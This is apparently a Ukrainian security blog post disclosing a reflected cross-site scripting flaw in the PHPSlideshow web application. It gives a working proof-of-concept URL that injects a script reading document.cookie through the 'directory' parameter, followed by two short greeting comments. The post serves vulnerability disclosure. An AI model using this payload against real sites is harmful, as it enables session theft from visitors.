Уразливість в PHPSlideshow
23:56 03.01.2009Учора, 02.01.2009, я знайшов Cross-Site Scripting уразливість в PHPSlideshow. Як раз коли виявив уразливість на eweek.com. Про що найближчим часом повідомлю розробникам веб додатку.
XSS:
Уразливість в index.php в параметрі directory.
http://site/slideshow/index.php?directory='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Потенційно вразливі всі версії PHPSlideshow.
Неділя, 21:35 04.01.2009
С Новым годом и наступающим Рождеством !
Неділя, 23:27 04.01.2009
Спасибо, Герман, тебя также.
Вот новогодний подарок для тебя
.